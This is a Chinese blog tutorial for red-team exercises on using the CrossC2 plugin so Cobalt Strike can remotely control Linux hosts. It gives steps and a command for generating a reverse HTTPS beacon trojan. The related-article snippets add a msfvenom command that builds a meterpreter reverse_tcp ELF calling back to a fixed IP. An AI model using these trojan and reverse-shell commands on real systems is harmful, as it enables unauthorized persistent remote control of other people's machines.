工具使用 | CobaltStrike上线Linux主机(CrossC2)

最新推荐文章于 2024-06-05 10:03:00 发布
最新推荐文章于 2024-06-05 10:03:00 发布
阅读量1.3w 收藏 12
点赞数 2
原文链接:https://xie1997.blog.csdn.net/article/details/106447120
版权

CobaltStrike上线Linux主机(CrossC2)

写在前面

在红蓝对抗中,我们经常会碰到需要对Linux主机进行长期远控的情况。对于Windows主机,我们可以使用CobaltStrike,那么自然我们会想问,CobaltStrike能否对Linux主机进行长期远控呢?

本文中将讲解如何通过在Linux上执行木马反弹一个CobaltStrike类型的shell,这得依赖于一个CobaltStrike的插件CrossC2。

CrossC2插件项目地址:https://github.com/gloxec/CrossC2

注:CrossC2项目官方声明只支持CobaltStrike3.14版本,本人亲测CobaltStrike4.0也可正常上线,但是无法执行其他操作。

1:首先,访问CrossC2项目地址,下载该项目。

将项目src目录下 genCrossC2.Linux 文件上传到CobaltStrike服务端目录下。

2:将 CobaltStrike 服务端的.cobaltstrike.beacon_keys下载到 CobaltStrike 客户端目录下。


3:由于 Cross C2目前只支持HTTPS Beacon,所以在Listenrs中选择HTTPS进行监听,

服务端开启监听 windows/beacon_https/reverse_https 类型的beacon

4:生成木马

./genCrossC2.Linux 监听的IP 监听的端口 null null Linux x64 test

5:执行木马上线


扫描下方二维码加入星球学习

加入后会邀请你进入内部微信群,内部微信群永久有效!

目前25000+人已关注加入我们

Ms08067安全实验室
关注
  • 2
    点赞
  • 12
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
Cobalt Strike Linux主机上线
m0_59119089的博客
08-19 567
Cobalt Strike 上线Linux 1. 简介 Cobalt Strike 默认不支持 linux MacOS 的远控 Cross C2是一个支持Linux & MacOS系统的拓展插件,支持用户自定义生成的动态库,以无文件落地的方式从内存中加载执行动态库或可执行文件 本文记录一下具体过程 项目地址:https://github.com/gloxec/CrossC2 2. 配置 1. Listner配置 首先是新增一个监听器,目前Cobaltstrike 4.3支持如下几种方式,具体暂
Cobalt Strike 4.0系列(三) --- 主机上线
skynet_x的博客
11-10 2672
概念引入 开始之前,需要引入几个概念。 stager: 定义 - 本身是一段尽可能小的手工优化过的汇编程序 参考 功能 - 连接到主控端,按照主控端的要求对大的payload (即 stage)进行下载、注入内存、执行 payload (即 stage): 定义 - 理论上是一段任意大小的、与位置无关的代码,被stager执行 功能 - 具体功能的实现,Cobalt Strike的许多攻击和工作流程都将payload用多个stage实现投递 stageless payload 可理解为包含了pay
cobaltstrike进阶篇之linux上线linux
最新发布
weixin_69925635的博客
06-05 246
cs的部署和基本上线过程可以参考我前面一篇文章,接下来尝试利用linux(服务端和客户端都放在同一台kali上)上线linux(ubuntu)将CrossC2-GithubBot-2023-03-27.cna其中path改成genCrossC2.linux的path。选择CSversion为4.4,日志中出现success,在指定目录下出现t_cc2.out,传到靶机并双击运行,成功上线。这个时候cs顶部会多出来一个选项,选择创建一个c2监听器,在之前需要先创建一个https的监听器。
CobaltStrike4.0上线Linux系统
就这样吧
09-15 1080
环境介绍 客户端系统:MacOS BigSur 服务端系统:MacOS BigSur 软件版本:CobaltStrike4.0 插件版本:CrossC2-cs4.0 被上线主机系统:Ubuntu20.04 插件介绍 面向企业自身及红队人员的安全评估框架,支持CobaltStrike对其他平台(Linux/MacOS/…)的安全评估,支持自定义模块,及包含一些常用的渗透模块。 ▄████▄ ██▀███ ▒█████ ██████ ██████ ▄███
Cobalt Strike 环境搭建与一次简单的上线教程
weixin_52049485的博客
01-08 5441
环境部署 服务器端:Kali 客户端:Win10 靶机:Win7 注意:CS基于java环境,首先安装java,jdk1.8 CS安装 将准备好的cs4.0压缩包拷贝到Kali中,解压后可以看到cs的目录结构 赋予 teamserver 执行权限 chmod +x teamsercer 运行方式:服务端ip,并且设置连接密码 ./teamserver 192.168.20.106 123456 如下图所示,cs就已经安装成功,进入等待客户端连接的状态。。。(默认50050端口) Windows客户端
cobaltstrike-linux.zip
07-09
标题 "cobaltstrike-linux.zip" 暗示了这是一个针对Linux系统的Cobalt Strike工具包。Cobalt Strike是一款广泛使用的网络安全评估工具,主要用于红队操作、渗透测试和模拟攻击,帮助安全专业人员评估组织的安全防护...
CrossC2:生成CobaltStrike的跨平台有效负载
02-03
"CrossC2:生成CobaltStrike的跨平台有效负载" 这个标题揭示了本文档的核心内容,它涉及到一个名为CrossC2工具,该工具能够生成适用于不同操作系统的Cobalt Strike(一种广泛用于红队行动和渗透测试的高级持续威胁...
渗透测试工具-Cobalt Strike
03-21
Cobalt Strike(简称CS)是一款广泛应用于网络安全领域的高级渗透测试工具,主要用于模拟攻击者的行为,帮助安全专业人员检测和评估组织的防御能力。这款工具以其强大的功能、易用性以及高度的定制化而备受推崇。 *...
cobalt strike 4.7
06-07
Cobalt Strike 4.7 是一款广泛应用在网络安全领域的高级渗透测试工具,它主要用于模拟攻击者行为,评估组织的安全防御能力。C2(Command and Control)工具是指远程控制服务器,Cobalt Strike 在此领域中扮演了核心...
CrossC2:生成CobaltStrike的跨平台有效载荷
03-21
十字C2| Cross C2-Generator CobaltStrike的跨平台信标 ▄████▄ ██▀███ ▒█████ ██████ ██████ ▄████▄ ██████▄ ▒██▀ ▀█ ▓██ ▒ ██▒▒██▒ ██▒▒██ ▒ ...
CobaltStrike如何上线Linux主机(解决坑位小白易懂)
晚安這個未知的世界
05-30 5899
前言 前段时间玩了一下打几层内网渗透的靶场实验,然后发现MSF可以上线,但是操作起来只能用命令操作,而且只能一个人的打,这时就想,CS这个强大的工具能不能上线Linux等其他平台的主机呢?于是百度、Google一番,弄了大概好几次,没弄成功,看了网上的大佬文章,感觉有点小细节没说出来,菜鸡的我折腾了很久,才成功的上线。下面我会详细的说一下,希望能帮助更多的小白去学习,让他们少走一些坑位。 工具CobaltStrike3.14版本,CrossC2使用的是2.0版本 CrossC2插件项目地址:https:
Linux被控主机反弹shell给Cobalt_Strike(CS)-详细实战笔记
面向感觉挖洞,背向对象编程。欢迎关注VX公众号:EureKa安全团队
08-28 3243
利用CrossC2插件工具,将Linux系统的shell反弹回Cobalt_Strike,方便后续的内网渗透。用CrossC2来反弹Linux主机shell给内网渗透工具Cobalt Strike(cs)。
Metasploit和Cobaltstrike上线不出网的机器
qq_40863723的博客
02-14 3989
多喝热水:http://hackergu.com 内网中的很多机器是不可以出网的,那该如何在Msf和CS中上线呢? MSF 我们的目标机器是一台linux服务器,我们先生成elf马。 msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.101.90 LPORT=7777 -f elf >test.elf 在目标机器上使...
Cobalt Strike 插件CrossC2(小白教程)
m0_63239459的博客
03-10 1815
cobaltstrike插件加载crossc2
Cobalt Strike几种不常见的上线方式
weixin_38168081的博客
08-12 3597
#Cobalt Strike新增了几种上线方式 介绍:Staged 和 Stageless 的区别. 前者的实际功能只是和 C2 建立连接并接收 Payload, 然后加载执行, 而 Stageless 直接省去了接收 Payload 的步骤. Stageless 生成除了的 Payload 都会比 Staged 类型的要大很多, 而且包含了特征明细 一.windows/b...
溯源反制-远程控制工具-CobaltStrike
m0_62172162的博客
04-25 617
溯源反制-远程控制工具-CobaltStrike
Cobalt Strike(cs)配合插件CrossC2,实现linux上线
m0_61867082的博客
06-26 2990
Cobalt Strike(cs)配合插件CrossC2,实现linux上线
kali安装cobaltstrike详细教程
Cwillchris的博客
12-30 4515
启动cs的服务端./teamserver 你的ip 密码(密码随便设置一个,待会用于客户端连接)下载cobaltstrike-linux版本,此下载链接提供4.3,4.4,4.5三个版本。给cs的服务端teamserver和客户端start.sh执行权限。进入cobaltstrike目录,ls查看如下。如果出现以下报错,说明jdk有问题。让你校验密码哈希值是否一直,点击是。xshell上传至kali,解压。输入以下内容,点击connect。重新安装jdk解决以上问题。
cobalt strike上线
07-27
你想了解关于 Cobalt Strike上线操作吗?Cobalt Strike 是一款强大的渗透测试工具,用于演练和评估网络安全防御能力。但是我无法提供有关该工具的具体操作指导,因为使用 Cobalt Strike 进行非法活动是违法的。如果你对网络安全感兴趣,建议你合法获取相关知识和技能,并遵守法律法规。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值